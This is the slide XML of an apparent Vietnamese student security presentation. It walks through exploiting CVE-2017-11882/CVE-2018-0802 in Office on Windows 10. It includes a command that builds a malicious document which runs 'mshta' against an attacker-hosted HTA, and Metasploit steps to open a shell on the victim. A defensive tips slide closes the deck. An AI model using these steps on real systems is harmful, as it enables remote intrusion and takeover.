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CB40-1FDF-4581-B784-FBA7B2D4D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D035D5-44DB-4725-8023-5C0D85117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6DBC5-954A-4DA7-8737-BC317C9854CF}"/>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74DFEB37-02DF-4844-AED6-00196E5DB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66334-1AE5-4E14-AE66-109BBF59C380}"/>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64841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E777-8CBF-4EA1-91FB-1241D3873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18AFD4-C164-4ECA-B1E7-0BCC95F5F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94A9A-D6AB-4709-97BD-A5F889E4E009}"/>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A9976A42-812F-4671-8553-299C31D0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52E10-95BA-4704-B019-F63E86667EE0}"/>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426696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BCA8D-5E34-4EBD-98B7-47DA1C73A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9FCCF2-26D1-4DF2-8E5C-9DCECB5DF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37291-D7DF-4BFD-8E04-721CA4DA412A}"/>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2BCF8B8B-D873-4442-88C6-EDF821E19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3E491-A2F2-445A-B228-CD6214409AE6}"/>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4632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99A4-9EDA-45FB-BB2B-AA7E15EE6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FF6F-8C1D-441E-9930-55DA10DC4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6DBF-6CDA-4430-8113-4FE80BDD113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5A5897C9-27F1-475D-81BB-884A706CF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BE090-44CC-4629-B89C-190F9A7CF11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87962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5C00-0FC7-4541-AB20-9B6299480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DEF64E-016B-4DF7-B9FC-1EF16E9A5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D2F911-BA53-4024-B5C7-DD615B07E5E8}"/>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F92B947E-E7A5-4B83-914D-433EEF73C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27EBA-A78F-421F-9266-3190FADD423A}"/>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06204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7141-5567-481A-B662-3AABD8802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6850A-B3EA-4CA1-BA69-A52280AC2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59B41-3E87-4F16-8393-14AA173BC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8169B-7E5F-43F8-938C-61A4296B8F87}"/>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864496D1-8B69-4DE3-99DD-A9103C452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8B3F4-4FC3-4DF5-ACBD-662095F7728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405021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D947-6079-4DEE-92B7-64FAE26711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8DE03-BC40-43CB-A080-0B4D4397C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A624E-A6B8-4EDE-BE77-4479C6716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17CA14-F345-42D7-B929-EA586EE0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B9A6C-CCF4-4BFB-8F5C-92EA3D747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7E7E4-927C-4F8B-8638-0BD0E236312D}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B49EEA2B-21EA-49F1-B099-CB3CF0C00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6C309-CA8D-4661-BA72-E3B02A8FD7D8}"/>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92019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CD86-2AF9-465C-BDD3-2BB095A120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2C7AB-4790-4135-9C63-BA878268C94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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C17AB7C5-49AC-428B-9917-65399A3B2B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83DD7-32B8-478D-B73A-FBD8C39E35C2}"/>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36604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DEB6B-62D6-4444-9D48-A41994D2716C}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{669AC470-58E3-4551-9050-AFABDB48E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ABE070-EC34-4D3B-8549-9EC1C929B6A3}"/>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96855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6A68-6AC8-4411-B81D-E51573E70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C73E6-E906-4F89-AD17-1D1E7BA9B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70A4B-34BF-4A9E-BD65-F55B7A5A1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7BDED-2626-4AE9-A584-0546FF9F4A1E}"/>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0F8557EA-81A3-42E5-9AFA-3C87C4E33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BFDF4-BD2E-4F88-8A80-9B62DDB47785}"/>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93074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8E07-1C1D-40D3-AED6-34FEB6F41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EDAD68-395D-45E4-8AAE-3922F9F95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6EC55-52D7-4F21-A014-FED35E03E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AE352-BA8B-4104-8B80-4B6BC1EA0209}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{97226747-928F-433B-B7B2-888F89432100}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/15/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A2460DD-B5CC-434F-BBD7-945460A90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0D782-5A77-416B-9173-8EBA4516486C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{873D2F56-2A61-43FE-8812-C4C24EC9D49A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189523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4EA83-8A41-406C-A689-7A61B6FF8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BFB9F-C778-4323-AF40-54EBAAE18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68339-6D8B-4883-B4E7-8A410BE39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6747-928F-433B-B7B2-888F89432100}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/15/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0EF60F9-EF4E-468F-A41A-1B1D383F5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DDBA98-92CD-4418-A1DE-31045E3AC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2F56-2A61-43FE-8812-C4C24EC9D49A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64573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5" y="406400"/>
            <a:ext cx="5966691"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000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>AN TOÀN BẢO MẬT THÔNG TIN</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3" y="1797784"/>
            <a:ext cx="7481453"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dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>KHAI THÁC LỔ HỔNG TRÊN WINDOWS 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD7B94DA-E7B8-4FAE-9562-CC1139325EE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-794327" y="4765119"/>
            <a:ext cx="5966691" cy="20928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600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>GVHD:   Lê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Trí</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Nhóm 4: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lvl="3"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Hùng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"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Quân</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7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214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chạy lệnh để tạo ra file tấn công. (Lưu ý phải tắt Windows Security): “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>python RTF_11882_0802.py -c "mshta http://169.254.237.110:8080/xxxxx.hta" -o tailieumat.doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>” với xxxxx.hta là dãy chữ lấy từ bên màng hình Terminal của Metasploit framework.</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78A5831D-9796-4A9B-89C4-8ECFBEB3B095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1015940" y="2827972"/>
            <a:ext cx="9775387" cy="3628246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152324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090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dựng host đơn giải để public file lên. Trên thực tế, nạn nhân có thể nhận file tấn công bằng các đường khác nhau như web hay mail: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>python -m SimpleHTTPServer 4444</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D360048B-C576-4A8E-9D18-0D132532DF7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="854334" y="2371991"/>
            <a:ext cx="10856135" cy="1996809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250543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676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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>A2</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Sau khi máy nạn nhân tải về và mở lên, tôi sẽ nhập lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>sessons -i 1</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6775CF93-2136-4B84-89A6-241DEF9B3397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="604953" y="2396890"/>
            <a:ext cx="11170171" cy="1140637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{218020F8-88F0-4FD0-A53E-7879021137A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604953" y="3537527"/>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máy nạn nhân đã bị tấn công tôi có thể xem được thông tin máy tính nạn nhân: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="34290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Để có thể chạy được cmd tôi gõ lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>shell</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đã có quyền </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t> hoặc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t> của máy nạn nhân</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298114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Kết</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đã tấn công thành công máy Windows 10 của nạn nhân và tôi đã tạo một thư mục trên màng hình desktop của nạn nhân</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Ngoài ra tôi có toàn quyền truy cập mà không bị giới hạn vì tôi đang ở quyền cao nhất là Admin hoặc Root.</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95724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Các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phòng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chống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37451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Update hệ điều hành và các phần mềm thường xuyên</a:t>
            </a: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Các phần mềm mới sẽ ngăn chặn các lỗ hổng </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Không kết nối vào các nguồn Internet công cộng không được bảo mật</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Tránh hoặc hạn chế nhấp vào các đường link lạ hoặc tải xuống các tệp không rõ nguồn gốc</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Không tắt tường lữa máy tính</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Cài đặc và cập nhật các phần mềm diệt virus</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Mua bản quyền các phần mềm, không Cr@ck phần mềm</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93833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9AB09-9DAC-445A-9DFC-47858B91DB5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2355273" y="2647530"/>
            <a:ext cx="7481453"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dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XIN CẢM ƠN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217453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191491" y="1691696"/>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Tổng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quan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về</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đề</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tài</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191491" y="3660290"/>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Quá</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trình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và</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quả</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thực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nghiệm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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323FFB-F0B8-43C1-BDF5-EE70B3B19ED9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191491" y="2603544"/>
            <a:ext cx="809105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0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cơ</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sở</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lý</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thuyết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33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Tổng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quan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về</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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>đề</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tài</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0127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Aft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Tổng quan về đề tài</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Khai thác lỗ hổng CVE-2017-11882 và CVE-2018-0802 trên Office 2010 và Windows 10</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Sử dụng công cụ Ubuntu Terminal và Windows Terminal để chạy các lệnh Linux</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Tấn công trên máy thật được kết nối qua cổng RJ45 Ethernet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Khó khăn khi thực hiện:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Không tìm ra được bản Windows 10 có lỗ hổng vì Microsoft cập nhật vá lỗi rất nhanh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>2.  Nhiệm vụ thực hiện</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Sau khi kết nối 2 máy cùng một mạng, gửi tệp tin cho nạn nhân</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Tiến hành khai thác trên máy nạn nhân</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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30886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Cơ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sở</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lý</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thuyết</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216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Để tấn công máy Windows 10 của đề tài này, tôi tiến hành khai thác 2 lỗ hỗng CVE-2017-11882 và CVE-2018-0802 trên Office 2010 và Windows 10</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Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2500" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kịch bản tấn công:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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Tôi là một Hacker tôi không biết máy nạn nhân có IP bao nhiêu tôi chỉ biết tôi đang kết nối được với máy nạn nhân</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>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Nạn nhân đã tải file có chữa mã độc về máy và mở ra (Máy nạn nhân đã tắt Windows Security) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>Tôi có thể truy cập vào máy nạn nhân và có thể vào Shell (CMD) trên quyền cao nhất là Admin hoặc Root.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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08190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6676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buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>A1</a:t>
            </a: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sử dụng Ubuntu Terminal trên Windows Terminal thây cho hệ điều hành Kali OS</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Để kiểm tra xem port nào dẫn ra ngoài tôi gõ lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>ifconfig</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C1C2BF84-DAB1-4C21-AC4A-D23DA4CAE541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047437" y="2983207"/>
            <a:ext cx="10097125" cy="3267001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65843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1090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Sau đó tôi biết được port ra ngoài của tôi là: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>169.254.237.110/16</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khởi chạy: Metasploit framework bằng lệnh: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2300" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="D3D3D3"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Yu Mincho" panose="02020400000000000000" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>msfconsole</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959A86FA-7067-40E8-926B-8F3D3586E662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="909753" y="2227364"/>
